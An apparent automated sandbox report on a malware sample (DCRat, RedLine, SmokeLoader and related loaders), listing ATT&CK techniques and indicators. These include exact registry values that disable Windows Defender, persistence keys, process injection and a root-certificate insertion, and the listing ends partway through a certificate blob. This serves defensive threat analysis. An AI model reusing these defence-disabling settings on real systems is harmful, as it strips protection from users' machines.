dcrat | 8f8ad283b107caad6d633c327f275570015810553c465b5db376637bc3f17779

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	6Yy4iK5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	6Yy4iK5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	6Yy4iK5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	6Yy4iK5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	6Yy4iK5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	6Yy4iK5.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

resource	yara_rule
behavioral1/memory/3440-21-0x0000000000400000-0x000000000043C000-memory.dmp	family_redline
behavioral1/files/0x00060000000006e5-100.dat	family_redline
behavioral1/files/0x00060000000006e5-98.dat	family_redline
behavioral1/memory/4388-112-0x0000000000AA0000-0x0000000000ADE000-memory.dmp	family_redline
behavioral1/memory/1844-140-0x0000000000540000-0x000000000059A000-memory.dmp	family_redline
behavioral1/memory/1844-155-0x0000000000400000-0x0000000000470000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 4136 created 3284	4136	latestX.exe	55
PID 4136 created 3284	4136	latestX.exe	55
PID 4136 created 3284	4136	latestX.exe	55
PID 4136 created 3284	4136	latestX.exe	55
PID 4136 created 3284	4136	latestX.exe	55

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	latestX.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

pid	Process
3888	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

.NET Reactor proctector 19 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/2688-52-0x0000000002380000-0x00000000023A0000-memory.dmp	net_reactor
behavioral1/memory/2688-56-0x0000000004990000-0x00000000049AE000-memory.dmp	net_reactor
behavioral1/memory/2688-57-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2688-58-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2688-62-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2688-60-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2688-66-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2688-64-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2688-68-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2688-70-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2688-78-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2688-80-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2688-76-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2688-74-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2688-72-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2688-82-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2688-84-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2688-86-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2688-88-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	DE1D.exe
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	DE1D.exe

Executes dropped EXE 32 IoCs

pid	Process
2580	qc0pE22.exe
4048	CY9LV27.exe
2776	2jQ4524.exe
4712	4qV643MX.exe
320	5ec7va3.exe
2688	6Yy4iK5.exe
4388	DC56.exe
2452	DD80.exe
1936	DE1D.exe
1844	E003.exe
2448	E301.exe
2760	DE1D.exe
4160	1945.exe
4704	Ent.pif
1676	279E.exe
2212	279E.exe
2452	279E.exe
2116	tor-real.exe
4776	chcp.com
1436	5612.exe
4604	InstallSetup5.exe
2884	toolspub2.exe
1364	Broom.exe
1960	Current.exe
2624	31839b57a4f11171d6abc8bbc4451ee4.exe
4136	latestX.exe
3192	Conhost.exe
3516	7DE0.exe
1104	DE1D.exe
2776	toolspub2.exe
4552	F478.exe
2700	31839b57a4f11171d6abc8bbc4451ee4.exe

Loads dropped DLL 11 IoCs

pid	Process
2116	tor-real.exe
2116	tor-real.exe
2116	tor-real.exe
2116	tor-real.exe
2116	tor-real.exe
2116	tor-real.exe
2116	tor-real.exe
2116	tor-real.exe
2116	tor-real.exe
1436	5612.exe
1436	5612.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	6Yy4iK5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	6Yy4iK5.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	DE1D.exe
Key opened	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	DE1D.exe
Key opened	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	DE1D.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	8f8ad283b107caad6d633c327f275570015810553c465b5db376637bc3f17779.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	qc0pE22.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	CY9LV27.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
114	ip-api.com

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 2776 set thread context of 3440	2776	2jQ4524.exe	93
PID 4712 set thread context of 404	4712	4qV643MX.exe	96
PID 1676 set thread context of 2452	1676	279E.exe	139
PID 2884 set thread context of 2776	2884	toolspub2.exe	164
PID 3192 set thread context of 3844	3192	Conhost.exe	168
PID 4552 set thread context of 1760	4552	F478.exe	187
PID 4160 set thread context of 3092	4160	1945.exe	199

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	latestX.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
224	sc.exe
3408	sc.exe
4360	sc.exe
2236	sc.exe
1416	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
3560	1436	WerFault.exe	144
3964	3516	WerFault.exe	157

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5ec7va3.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5ec7va3.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5ec7va3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
3224	schtasks.exe
1196	schtasks.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
956	tasklist.exe
3916	tasklist.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	schtasks.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	schtasks.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	schtasks.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d60168000000010000000800000000409120d035d901030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	DE1D.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1368000000010000000800000000409120d035d9017e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d